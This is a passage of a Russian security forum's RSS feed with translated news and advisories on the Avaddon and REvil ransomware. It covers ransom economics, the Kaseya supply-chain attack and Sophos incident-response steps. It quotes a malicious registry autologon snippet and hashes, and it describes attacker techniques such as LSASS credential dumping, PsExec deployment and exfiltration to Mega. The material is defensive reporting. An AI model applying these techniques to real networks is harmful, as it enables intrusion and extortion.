которые работали с Avaddon, - объясняя и интерпретируя быстрый рост и еще более быстрое падение групп.<br /><br />11 июня 2021 года Avaddon выпустила ключи для более чем 2000 жертв, содержащие точные имена компаний-нарушителей.<br /><br />Наш анализ подтвержденной виктимологии показывает, что некоторые из них были ведущими мировыми компаниями. Как этой группе удалось за год поразить такое количество компаний? Ответ: Avaddon создал вокруг себя целую экосистему - сеть цепочек поставок, международных филиалов, продавцов, менеджеров подпольных аукционов и переговорщиков. Они создали органическую экосистему экономики криминального вымогательства - форму «выкупа».<br /><br />Конечно, Avaddon была не единственной группой, придерживавшейся диверсифицированного подхода к построению более крупной бизнес-системы. Однако, вероятно, они были самыми креативными. Они были единственной группой, которая позволяла международным партнерам присоединяться к команде в качестве аффилированных лиц, которые непосредственно освещали атаки Avaddon на пяти континентах, но способствовали их продвижению.<br /><br />Одна из крупнейших атак Avaddon - на крупное финансовое учреждение, произошедшая в мае 2021 года - иллюстрирует этот комплексный подход к построению экономики атак с использованием программ-вымогателей.<br /><br />Операции Avaddon ориентированы на компании и правительства по всему миру, за исключением России.<br /><br /> &nbsp; &nbsp;<br />====quote====<br />Во время исследования атаки мы обнаружили 141 уникальный индикатор компрометации RDP для домена жертвы. Это означает, что Avaddon использовал услуги группы перебора RDP... Другими словами, до того, как Avaddon выполнил операцию по краже данных, они могли использовать весь объем подпольных сервисов и приобрести полный набор - доступ по протоколу RDP, прямой доступ к сети и вредоносное ПО для кражи данных.<br />=============<br /><br />Виктимология - ключ к пониманию противника<br /><br />Этот новаторский подход позволил Avaddon выполнить несколько тысяч атак.<br /><br />Традиционно при профилировании виктимологии группы компании полагаются на общедоступные данные, то есть на веб-сайты с программами-вымогателями. И действительно, даже глядя на эти частичные данные, которые включают только компании, информация о которых была сброшена в блоги, мы можем увидеть, что Avaddon сыграл важную роль в ландшафте угроз.<br /><br /><img src="https://static.wixstatic.com/media/9d5cee_daa9d710b45f43e88be3a6d0e3447127~mv2.png/v1/fill/w_740,h_349,al_c,q_90/9d5cee_daa9d710b45f43e88be3a6d0e3447127~mv2.webp" alt="Пользователь добавил изображение" border="0" /><br /><br />Однако жертвы, имена которых были опубликованы в блоге позора, - это только верхушка айсберга. Расширенный набор данных AdvIntel, охватывающий всех жертв Avaddon, обеспечивает дополнительную прозрачность операций.<br /><br />Для этого статистического исследования компания AdvIntel выбрала специальный набор данных для ценных целей. Во-первых, мы определили отрасли, которые были основными целями группы - производство, розничная торговля, технологии и машиностроение, которые, скорее всего, являются наиболее предпочтительными секторами, потому что для компаний в этих секторах даже кратковременный перерыв в работе может повлечь за собой фатальные последствия.<br /><br />На следующем этапе мы провели исследование рынка доходов жертв, чтобы определить потенциальную схему атак Avaddon.<br /><br />Общий доход всех жертв составил около 35 миллиардов долларов. Это число, по сути, сегмент рынка, которому так или иначе угрожают вредоносные операции Avaddon.<br /><br />Жертв Аваддона можно разделить на три категории: маленькие, средние и большие.<br /><br />Средний доход жертвы составил:<br /><br />13 миллионов долларов США для малого бизнеса<br />287 миллионов долларов для жертв среднего размера<br />3,7 миллиарда долларов США для крупного бизнеса<br /><br />Ransonomics: прибыль от программ-вымогателей Avaddon<br /><br />Наша следующая цель исследования состояла в том, чтобы подсчитать, сколько денег может заработать группа Avaddon до своего быстрого выхода на пенсию. Мы использовали наши предыдущие знания, полученные в результате взаимодействия с злоумышленниками, для разработки реалистичных формул расчета требований выкупа, подкрепленных реальными делами Avaddon.<br /><br />После определения дохода они исследуют сектор, в котором работает жертва. Наиболее распространенным расчетом, который, согласно нашим конфиденциальным и достоверным источникам информации, используемым Avaddon, был так называемое правило «5x5», когда 5% годового дохода используется для начала переговоров, а годовой доход оценивается в одну пятую от общий доход. Другими словами, для жертвы, чей общий доход составляет 7 миллионов долларов США, начальная цена выкупа будет составлять 70 000 долларов США. Как правило, Avaddon снижал цену во время торга, и конечный выкуп составлял около 50 000 долларов США за успешную операцию.<br /><br />Однако не все компании из двухтысячного списка жертв были вынуждены заплатить такой выкуп. Во многих случаях переговоры заканчивались неудачей или выкуп был минимальным - несколько тысяч долларов (особенно в самом начале). В то же время более крупные платежи требовали от более крупных организаций. Однако здесь формула «5x5» была заменена более адекватной шкалой для более крупного выкупа, включающей 0,01% годовой прибыли вместо 5% и т. Д. Для многомиллиардной компании спрос ограничивался несколько миллионов долларов.<br /><br />После завершения всех расчетов с индивидуальным изучением каждой жертвы из набора ценных данных, AdvIntel установил, что основная часть выкупа поступила от более чем тысячи небольших компаний, которые требовали от 30 000 до 70 000 долларов США и составила 55 миллионов долларов, выплаченных компании Avaddon. Более 500 крупных предприятий в списке потерпевших составили еще 30 миллионов долларов, а остальная часть была поделена между более мелкими выплатами. Таким образом, наша общая оценка дохода Avaddon составляет приблизительно 87 миллионов долларов США.<br /><br />Наша команда также попыталась рассчитать доход основного члена команды Avaddon на основе этих чисел. В рамках Avaddon RaaS более 70% дохода шло филиалам, поэтому основная команда, и особенно лидер Avaddon, получила около 26 миллионов долларов США. Это число, вероятно, было разделено по крайней мере между четырьмя людьми, которые получили приблизительный годовой доход (Avaddon существовал в течение года) 7 000 000 долларов США. Для сравнения - средний годовой доход в России оценивается в 7000 долларов.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;Другими словами, за год разработки программ-вымогателей член Avaddon заработал столько же денег, сколько средний россиянин за тысячелетие<br />=============<br /><br />Крушение Аваддона - Черная метка киберпиратов<br /><br />Если Avaddon был таким успешным, что могло побудить их бросить курить? Вероятный ответ - страх. Правоохранительные органы США и администрация Байдена были очень откровенны в отношении будущих ответных мер против программ-вымогателей и новой точки зрения, в которой вымогатели рассматриваются как, по сути, террористический акт. Этот новый подход к цифровому вымогательству со стороны ведущей мировой сверхдержавы вызвал прямой отклик в подпольном сообществе - вышеупомянутая вымогательство - тщательно и скрупулезно выстроенная сеть альянсов и цепочек поставок - начала быстро терпеть неудачу.<br /><br />Программные брокеры отказались продавать вредоносное ПО группам вымогателей, форумы запретили партнерство RaaS, а филиалы остались без средств и услуг для распространения полезной нагрузки. Мир киберпреступности всегда был похож на пиратство, и у него есть собственная «черная метка» - смертельный знак стигмы - после Colonial Pipeline программы-вымогатели получили этот знак на себе. Avaddon, находившийся в центре динамичной и бурной экосистемы программ-вымогателей, быстро осознал риски, с которыми они могут столкнуться.<br /><br />Когда политика встречает киберпреступность<br /><br />Это осознание, вероятно, было вызвано недавним вмешательством политики в сферу киберпреступности. В целом внутренняя логика российского ландшафта безопасности предполагает, что успешная кибер-группа в какой-то момент станет достаточно заметной, чтобы привлечь внимание государства. Обычно правоохранительные органы закрывают глаза на кибероперации, если только эти операции не нацелены на российских граждан или бизнес. Однако в мае 2021 года этот статус-кво изменился.<br /><br /> &nbsp; &nbsp;<br />====quote====<br />После того, как администратор крупнейшего форума XSS призвал к запрету программ-вымогателей, оправдывая это политическими причинами, сообщество цифровых вымогателей в России, как было замечено, прошло стадии паранойи. Это было подтверждено только многочисленными заявлениями, сделанными за последние три месяца правительством России, Министерством иностранных дел России и лично президентом Путиным о создании международной российско-американской инициативы по созданию совместного ландшафта кибербезопасности. Российские официальные лица, вероятно, видят в этом инструмент деэскалации американо-российских отношений, особенно в свете предстоящего саммита Байдена и Путина, намеченного на 16 июня 2021 года.<br /><br />=============<br /><br />Также примечательно, что некоторые из юрисдикций, на которые нацелен Аваддон, - Иран, Китай и Турция, имеют прочные геополитические связи с Россией и действуют как российские союзники или важные экономические партнеры. Однако неясно, могло ли это привести к обострению отношений между Аваддоном и российским государством.<br /><br />Какими бы ни были истинные доводы российских политиков, призывающих к международному сотрудничеству в области кибербезопасности, эти недавние заявления явно оказали влияние на подпольное сообщество киберпреступников. AdvIntel отслеживает многочисленные обсуждения между высокопоставленными участниками, работающими с Avaddon, которые упомянули, что одно из аффилированных лиц группы было задержано российскими правоохранительными органами накануне американо-российского саммита и что могут последовать дальнейшие аресты лидеров программ-вымогателей с целью обезопасить политический ландшафт.<br /><br />Avaddon Decryption Tool<br /><noindex><a href="https://www.emsisoft.com/ransomware-decryption-tools/avaddon" target="_blank" rel="nofollow">https://www.emsisoft.com/ransomware-decryption-tools/avaddon</a></noindex><br /><br /><noindex><a href="https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire" target="_blank" rel="nofollow">https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire</a></noindex> <br />
			<i>20.07.2021 16:46:25, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16490/message112744/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16490/message112744/</guid>
			<pubDate>Tue, 20 Jul 2021 16:46:25 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>REvil Ransomware поразил 200 компаний в результате атаки на цепочку поставок MSP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16479/message112706/">REvil Ransomware поразил 200 компаний в результате атаки на цепочку поставок MSP</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Массовая атака REvil затрагивает нескольких поставщиков управляемых услуг и их клиентов через атаку цепочки поставок Kaseya, о которой сообщается.<br /><br />Начиная с полудня июля, REvil, также известная как Sodinokibi, нацелена на MSP с тысячами клиентов с помощью атаки на цепочку поставок Kaseya VSA.<br /><br />В настоящее время существует восемь известных крупных поставщиков услуг мобильной связи, которые пострадали в результате этой атаки на цепочку поставок.<br /><br />Kaseya VSA - это облачная платформа MSP, которая позволяет поставщикам выполнять управление исправлениями и мониторинг клиентов для своих клиентов.<br /><br />Атака REvil распространяется через автообновление<br /><br />Как сообщили BleepingComputer атаки на MSP, по всей видимости, являются атакой на цепочку поставок через Kaseya VSA.<br /><br />В результате обновления, Kaseya VSA поместит файл agent.crt в папку c: \ kworking, которая распространяется как обновление под названием «Kaseya VSA Agent Hot-fix».<br /><br />Затем запускается команда PowerShell для декодирования файла agent.crt с помощью допустимой команды Windows certutil.exe и извлечения файла agent.exe в ту же папку.<br /><br /><img src="https://www.bleepstatic.com/images/news/ransomware/attacks/k/kaseya/powershell-command.png" alt="Пользователь добавил изображение" border="0" /><br /><br />Agent.exe подписан с использованием сертификата от «PB03 TRANSPORT LTD» и включает встроенные файлы «MsMpEng.exe» и «mpsvc.dll», при этом DLL является шифровальщиком REvil.<br /><br />MsMPEng.exe - это более старая версия законного исполняемого файла Microsoft Defender, используемого в качестве LOLBin для запуска DLL и шифрования устройства с помощью доверенного исполняемого файла.<br /><br />Некоторые образцы добавляют ключи реестра Windows и изменения конфигурации зараженных компьютеров.<br /><br />Например, образец [VirusTotal], установленный BleepingComputer, добавляет ключ HKLM \ SOFTWARE \ Wow6432Node \ BlackLivesMatter для хранения информации о конфигурации атаки.<br /><br />Специалист Intel Виталий Кремез сообщил BleepingComputer, что другой образец настраивает устройство для запуска REvil Safe Mode с паролем по умолчанию «DTrump4ever».<br /><br /> &nbsp; &nbsp;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]<br /> &nbsp; &nbsp;"AutoAdminLogon"="1"<br /> &nbsp; &nbsp;"DefaultUserName"="[account_name]"<br /> &nbsp; &nbsp;"DefaultPassword"="DTrump4ever"<br /><br />Fabian Wosar выпустил расшифрованную копию конфигурации шифратора REvil / Sodin. Этот файл содержит подробную информацию о полезной нагрузке программы-вымогателя, включая списки уничтоженных процессов, компоненты из белого списка и используемые домены управления и контроля.<br /><br />IOC (SHA256):<br /><br />agent.exe d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e<WBR/>&shy;9f1e<br /><br />mpsvc.dll (загруженная DLL) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a546<WBR/>&shy;6ea2<br /><br />mpsvc.dll (загруженная DLL) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae7<WBR/>&shy;59dd<br /><br />MSP - важная цель для кибергрупп, поскольку они предлагают простой канал для заражения многих компаний посредством единственного взлома, однако атаки требуют глубоких знаний о MSP и используемом ими программном обеспечении.<br /><br />REvil имеет аффилированное лицо, хорошо разбирающееся в технологиях, используемых MSP, поскольку у них есть долгая история нацеливания на эти компании и программное обеспечение, обычно используемое ими.<br /><br />В июне 2019 года филиал REvil нацелился на MSP через удаленный рабочий стол, а затем использовал их программное обеспечение для управления, чтобы отправить установщиков программ-вымогателей на все конечные точки, которыми они управляют.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-200-companies-in-msp-supply-chain-attack/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-200-companies-in-msp-supply-chain-attack/</a></noindex><br /><noindex><a href="https://app.any.run/tasks/d02a2a64-750a-47fb-a310-178d1f7276a1#" target="_blank" rel="nofollow">https://app.any.run/tasks/d02a2a64-750a-47fb-a310-178d1f7276a1#</a></noindex><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/</a></noindex><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-asks-70-million-to-decrypt-all-kaseya-attack-victims/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/revil-ransomware-asks-70-million-to-decrypt-all-kaseya-attack-victims/</a></noindex><br /><noindex><a href="https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" target="_blank" rel="nofollow">https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/</a></noindex> <br />
			<i>09.07.2021 09:52:55, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16479/message112706/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16479/message112706/</guid>
			<pubDate>Fri, 09 Jul 2021 09:52:55 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Если у вас, если у вас.. если вас атакует Avaddon Ransomware</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16445/message112558/">Если у вас, если у вас.. если вас атакует Avaddon Ransomware</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Программа-вымогатель Avaddon - это программа-вымогатель как услуга (RaaS), сочетающая шифрование с кражей данных и вымогательством. Avaddon существует с 2019 года, но с июня 2020 года он стал более заметным и агрессивным. «Аффилированные лица» или клиенты службы наблюдали развертывание Avaddon для широкого круга целей во многих странах, часто посредством злонамеренного спама и фишинговых кампаний с импользованием JavaScript.<br /><br />Организации, пораженные программой-вымогателем Avaddon, сталкиваются не только с шифрованием данных - существует также угроза раскрытия общедоступных данных на сайте утечки Avaddon и, в последнее время, риск распределенных атак типа «отказ в обслуживании» (DDoS), нарушающих работу. Эта тактика призвана усилить давление на жертв с требованием выкупа.<br /><br /><B>Что делать немедленно: сдержать и обезвредить</B><br /><br />Первое, что вам нужно сделать, это определить, продолжается ли атака. Если вы подозреваете, что это так, и у вас нет инструментов, чтобы остановить это, определите, какие устройства были затронуты, и немедленно изолируйте их. <B>Самый простой вариант - просто отсоединить сетевой кабель или выключить адаптер Wi-Fi. Если повреждение более масштабное, чем повреждение нескольких устройств, подумайте о том, чтобы сделать это на уровне коммутатора и отключить в автономном режиме целые сегменты сети, а не отдельные устройства. Выключайте устройства только в том случае, если не можете отключить сеть.</B><br /><br />Во-вторых, нужно оценить ущерб. Какие конечные точки, серверы и операционные системы были затронуты, что было потеряно? Ваши резервные копии остались нетронутыми или злоумышленник удалил их? Если они целы, немедленно сделайте автономную копию. Кроме того, какие машины были защищены?<br /><br />В-третьих, есть ли у вас комплексный план реагирования на инциденты? Если нет, вам необходимо определить, кто должен быть вовлечен в работу с этим инцидентом. Потребуются ИТ-администраторы и высшее руководство, но вам также может потребоваться привлечь внешних экспертов по безопасности, проконсультироваться с киберстраховщиком и юрисконсультом. Следует ли вам сообщать об инциденте в правоохранительные органы и / или информировать органы по защите данных? Также возникает вопрос о том, какую информацию следует предоставлять пользователям и клиентам, многие из которых, вероятно, придут на работу и столкнутся с аналогичной запиской о выкупе на своем рабочем столе.<br /><br />И последнее, но не менее важное: вы хотите поговорить с людьми о том, что происходит, но злоумышленники могут подслушивать, поэтому не используйте обычные каналы связи. Например, если злоумышленники находятся в вашей сети какое-то время, у них, вероятно, будет доступ к электронной почте. <br /><br /><B>Что делать дальше: исследовать</B><br /><br />После того, как вам удалось сдержать и нейтрализовать атаку, найдите время, чтобы исследовать, что произошло, чтобы снизить вероятность ее повторения. Если вы не уверены в том, что делаете это самостоятельно, поставщики средств безопасности, в том числе Sophos, круглосуточно предлагают помощь специалистов по реагированию на инциденты и поиску угроз.<br /><br />По словам команды Sophos Rapid Response, это то, чего вам следует ожидать от активности вымогателя Avaddon в вашей сети:<br /><br />1. Скорее всего, злоумышленники были в вашей сети несколько дней или даже недель. Avaddon - это программа-вымогатель как услуга, включающая кражу данных. Он управляется человеческими аффилированными лицами, которые получают долю от выкупа. Партнерам нужно время, чтобы изучить сеть цели, чтобы найти и украсть ценные данные и обеспечить максимальное нарушение работы, поскольку это позволяет им взимать более высокие выкуп.<br /><br />Лица, отвечающие за реагирование на инциденты Sophos, наблюдали время ожидания злоумышленников от 10 до 28 дней в атаках, связанных с выпуском программы-вымогателя Avaddon.<br /><br />2. Злоумышленники могут использовать множество различных методов для взлома вашей сети. Известные методы начального доступа для программ-вымогателей Avaddon включают, помимо прочего, спам-кампании, доставляющие вредоносные файлы JavaScript, открытые службы RDP (протокол удаленного рабочего стола) и уязвимые виртуальные частные сети (VPN). Такие сайты, как Shodan.io, дают представление о том, что может сделать злоумышленник. узнать о своей сети; попробуйте использовать его для поиска ваших внешних IP-адресов.<br /><br />Злоумышленники Avaddon нацелены на системы как Windows, так и Linux.<br /><br />3. У них будет защищенный доступ к учетным записям администраторов домена, а также к другим учетным записям пользователей. Злоумышленники обычно взламывают несколько учетных записей во время атаки. Их основная цель - получить доступ к учетным записям администраторов домена, которые они могут использовать для запуска вымогателей. Однако они также нацелены на определенные учетные записи администраторов, которые имеют доступ к конфиденциальным данным, системам резервного копирования и консолям управления безопасностью.<br /><br />Злоумышленники Avaddon используют такие инструменты, как Mimikatz, для кражи учетных данных для доступа к учетной записи и для повышения привилегий после того, как они окажутся внутри сети. Mimikatz может собирать информацию из запущенного процесса Microsoft LSASS.exe, который содержит хэши имен и паролей пользователей, вошедших в систему в данный момент. Иногда злоумышленники оставляют эту функцию включенной, а затем намеренно ломают что-то на компьютере, на которое они нацелены, спровоцировав администратора войти в систему, чтобы исправить это. Затем злоумышленники могут захватить учетные данные этого администратора.<br /><br />Если Mimikatz заблокирован программным обеспечением безопасности, злоумышленники могут вместо этого использовать что-то вроде Microsoft Process Monitor для создания дампа памяти LSASS.exe и переноса этого файла дампа обратно на свою машину для извлечения информации с помощью Mimikatz. С Mimikatz не имеет значения, насколько длинные или сложные пароли, потому что они забирают их прямо из памяти.<br /><br />4. Они просканируют вашу сеть. Они знают, сколько у вас серверов и конечных точек и где вы храните свои резервные копии, критически важные для бизнеса данные и приложения. Одна из первых вещей, которую делают злоумышленники, когда они попадают в сеть, - это определить, какой доступ у них есть на локальной машине. Следующий шаг - выяснить, какие существуют удаленные машины и могут ли они получить к ним доступ.<br /><br />Операторы программ-вымогателей Avaddon, как и многие другие злоумышленники, использующие ручную клавиатуру, используют RDP для внутреннего бокового перемещения внутри сети, используя его для проникновения на серверы и компьютеры, которые несут ценные активы.<br /><br />5. Злоумышленники, скорее всего, загрузили и установили бэкдоры, которые позволяют им заходить и выходить в вашу сеть и устанавливать дополнительные инструменты. Они настроят папки и каталоги для сбора и хранения украденной информации и каналов для связи с злоумышленниками и для передачи информации из вашей сети.<br /><br />Бэкдоры бывают разных форм. Некоторые просто связываются с IP-адресом злоумышленников, позволяя им отправлять и получать команды на машину.<br /><br />Многие бэкдоры классифицируются как легальные приложения. Например, злоумышленники могут использовать инструменты удаленного администрирования, такие как RDP, для поддержания доступа. Даже если RDP отключен по умолчанию, злоумышленнику с правами администратора очень легко его снова включить. Еще один распространенный законный инструмент - AnyDesk. Это предлагает злоумышленникам прямой контроль над машиной, включая управление мышью / клавиатурой и возможность видеть экран.<br /><br />Известно, что операторы Avaddon используют Cobalt Strike, усовершенствованный инструмент для постэксплуатационного тестирования на проникновение. Злоумышленники часто пытаются установить маяк Cobalt Strike. Это обеспечивает регулярную обратную связь с сервером Cobalt Strike («командование и управление» для атаки Avaddon) и дает злоумышленникам полный контроль над машиной. Его также можно использовать для простого развертывания дополнительных маяков на других машинах в сети.<br /><br />6. В дополнение к шифрованию данных и нарушению работы программного обеспечения и операций операторы Avaddon будут пытаться эксфильтровать корпоративные данные до основного события, связанного с вымогательством. Специалисты по реагированию на инциденты, которые расследовали атаки с участием Avaddon, обнаружили, что операторы использовали инструмент архивирования WinRar для сбора данных для эксфильтрации, а затем переправили данные поставщику облачного хранилища <noindex><a href="http://www.Mega.nz" target="_blank" rel="nofollow">www.Mega.nz</a></noindex>, используя свое приложение MegaSync. Mega пользуется популярностью у злоумышленников, поскольку предлагает им определенный уровень анонимности.<br /><br />7. Они попытаются зашифровать, удалить, сбросить или удалить ваши резервные копии. Если ваши резервные копии не хранятся в автономном режиме, они находятся в пределах досягаемости злоумышленников. «Резервная копия», которая постоянно находится в сети и доступна, - это всего лишь вторая копия файлов, ожидающих шифрования.<br /><br />8. Злоумышленники попытаются определить, какое решение безопасности используется в сети и могут ли они его отключить. Неважно, насколько хороша ваша защита, если злоумышленник может ее отключить.<br /><br />Бесплатные инструменты по умолчанию, такие как Защитник Windows, могут быть немедленно отключены любым, у кого есть достаточные права администратора. Большинство современных программ-вымогателей пытаются сделать это по умолчанию. Злоумышленники также пытаются найти и получить доступ к консолям управления более продвинутых решений безопасности, чтобы отключить всю защиту непосредственно перед запуском программы-вымогателя.<br /><br />Консоли управления безопасностью, размещенные локально, особенно подвержены риску, поскольку злоумышленники могут получить к ним доступ с учетными записями, которые они уже взломали.<br /><br />9. Наиболее заметная часть атаки - выпуск программы-вымогателя - вероятно, произошла, когда ИТ-администраторы или специалисты по безопасности не были в сети, чтобы заметить и предотвратить длительный процесс шифрования файлов, возможно, посреди ночи или в выходные дни.<br /><br />Примечание. Процесс шифрования занимает несколько часов. К моменту завершения работы программы-вымогателя на зашифрованной конечной точке Windows будут находиться десятки или сотни тысяч зашифрованных файлов. Для больших файловых серверов это может исчисляться миллионами. Вот почему большинство целевых атак программ-вымогателей запускаются посреди ночи, в выходные или праздничные дни, когда их наблюдает меньше людей.<br /><br />10. Программа-вымогатель будет развернута на всех ваших конечных точках и любых серверах, которые были подключены к сети во время атаки - при условии, что это то, чего хотел злоумышленник. Программа-вымогатель «развертывается» как обычное приложение; в большинстве атак он не распространяется случайным образом во всех направлениях. Если ваши серверы были зашифрованы, но не ваши конечные точки, это потому, что злоумышленник решил нацеливаться только на ваши серверы.<br /><br />Программа-вымогатель может быть развернута разными способами. В случае Avaddon злоумышленники, скорее всего, создали запланированные задачи на конечных точках и серверах в сети, которые развернули программу-вымогатель в заранее определенное время.<br /><br />Другой метод, обычно используемый многими различными семействами программ-вымогателей, - это комбинация пакетных сценариев и инструмента Microsoft PsExec, который является отличным инструментом для выполнения команд на удаленных машинах. Злоумышленник может создать пакетный сценарий, который просматривает список ваших IP-адресов, используя PsExec для копирования программы-вымогателя на каждую машину, а затем выполняет ее.<br /><br />Хотя большинство решений безопасности (включая Sophos) по умолчанию блокируют PsExec, администраторы часто разрешают его использование в своей сети, потому что они тоже считают его полезным - и, к сожалению, злоумышленники это знают.<br /><br />Злоумышленники также могут создать или изменить существующий сценарий входа в систему объекта групповой политики (GPO). Если вы не заметите этого, атака может возобновляться каждый раз, когда машина загружается и подключается к домену. Создается впечатление, что программа-вымогатель «распространяется», когда она вызвана только объектом групповой политики.<br /><br />11. Запуск программы-вымогателя - это еще не конец. Злоумышленники могут использовать установленные ими ранее инструменты, чтобы оставаться в сети для отслеживания ситуации и даже для вашей электронной почты, чтобы увидеть, как вы реагируете на выпуск программы-вымогателя. Электронное письмо генеральному директору, в котором говорится, что с вами все будет в порядке, потому что они не зашифровали резервные копии на Сервере X, может привести к катастрофе, если злоумышленник прочитает его и все еще имеет доступ к этому серверу.<br /><br />Злоумышленник также может дождаться вашего восстановления, чтобы затем запустить вторую атаку, чтобы действительно подчеркнуть, что он может продолжать делать это, пока вы не заплатите.<br /><br />У злоумышленников Avaddon есть еще одна тактика, направленная на то, чтобы заставить цели заплатить: они запускают DDoS-атаку в попытке нарушить работу и связь.<br /><br />12. Время, проведенное в вашей сети, вероятно, позволило злоумышленникам украсть критически важную, конфиденциальную и конфиденциальную информацию, которую они теперь угрожают публично раскрыть. Контроллеры Avaddon RaaS используют общедоступный «сайт утечки»: avaddongun7rngel [.] Onion. Цели, пораженные филиалами Avaddon, подвергаются риску публикации их данных на сайте для всеобщего обозрения, если они не заплатят выкуп. Некоторые из наиболее ценных данных могут быть проданы другим злоумышленникам для использования в дальнейших атаках.<br /><br />Злоумышленники Avaddon утверждают, что они начнут публиковать украденные данные где-нибудь через несколько дней или неделю после основной атаки, если не будет получен контакт с целью или переговоры прервутся. Обычно они начинают с публикации около 5% данных, которые, по их утверждениям, хранятся. Однако может пройти несколько недель или даже больше, прежде чем что-либо будет опубликовано.<br /><br />Кроме того, хотя злоумышленники могут пообещать удалить вашу информацию, если вы заплатите, у вас нет никаких гарантий, что они это сделают.<br />Что могут сделать защитники<br /><br />Вы можете предпринять ряд упреждающих шагов для повышения своей ИТ-безопасности в будущем, в том числе:<br /><br /> <br />====quote====<br /> &nbsp; &nbsp; Контролируйте свою сетевую безопасность 24/7 и помните <noindex><a href="https://news.sophos.com/en-us/2020/08/04/the-realities-of-ransomware-five-signs-youre-about-to-be-attacked/" target="_blank" rel="nofollow">о пяти ранних индикаторах присутствия злоумышленника</a></noindex>, чтобы остановить атаки программ-вымогателей, прежде чем они начнутся.<br /><br /> &nbsp;Отключите протокол удаленного рабочего стола (RDP) с выходом в Интернет, чтобы запретить киберпреступникам доступ к сетям. Если вам нужен доступ к RDP, поместите его за VPN-соединение и принудительно используйте многофакторную аутентификацию (MFA).<br /><br /> &nbsp; &nbsp;Обучите сотрудников тому, на что следует обращать внимание в отношении фишинга и вредоносного спама, и внедрите надежные политики безопасности.<br /><br /> &nbsp; &nbsp;Регулярно создавайте резервные копии самых важных и актуальных данных на автономном устройстве хранения. Стандартная рекомендация для резервного копирования - следовать методу 3-2-1: 3 копии данных с использованием 2 разных систем, 1 из которых находится в автономном режиме.<br /><br /> &nbsp; &nbsp;Предотвратите доступ злоумышленников к вашей безопасности и отключите ее: выберите расширенное решение с облачной консолью управления с включенной многофакторной аутентификацией и ролевым администрированием для ограничения прав доступа<br /><br /> &nbsp; &nbsp;Помните, что не существует единой серебряной пули для защиты, и важна многоуровневая, многоуровневая модель безопасности - распространите ее на все конечные точки и серверы и убедитесь, что они могут обмениваться данными, связанными с безопасностью<br /><br /> &nbsp; &nbsp;Разработайте эффективный план реагирования на инциденты и обновляйте его по мере необходимости. Если вы не уверены, что обладаете навыками или ресурсами, чтобы делать это, отслеживать угрозы или реагировать на чрезвычайные ситуации, подумайте об обращении за помощью к внешним экспертам.<br /><br />=============<br /><br />Заключение<br /><br /><span class="bx-font" style="font-size:14pt; line-height: normal;">Работа с кибератакой - это стрессовый опыт. Может возникнуть соблазн устранить непосредственную угрозу и закрыть книгу об инциденте, но правда в том, что таким образом вы вряд ли устранили все следы атаки. <B>Важно, чтобы вы нашли время, чтобы определить, как злоумышленники проникли, извлечь уроки из любых ошибок и улучшить свою безопасность.</B> Если вы этого не сделаете, вы рискуете, что тот же злоумышленник или другой может прийти и сделать то же самое на следующей неделе.</span><br /><br /><noindex><a href="https://news.sophos.com/en-us/2021/05/24/what-to-expect-when-youve-been-hit-with-avaddon-ransomware/" target="_blank" rel="nofollow">https://news.sophos.com/en-us/2021/05/24/what-to-expect-when-youve-been-hit-with-avaddon-ransomware/</a></noindex> <br />
			<i>09.06.2021 03:53:43, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16445/message112558/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16445/message112558/</guid>
			<pubDate>Wed, 09 Jun 2021 03:53:43 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Как защитить сеть от DarkSide и других программ-вымогателей</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16422/message112386/">Как защитить сеть от DarkSide и других программ-вымогателей</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
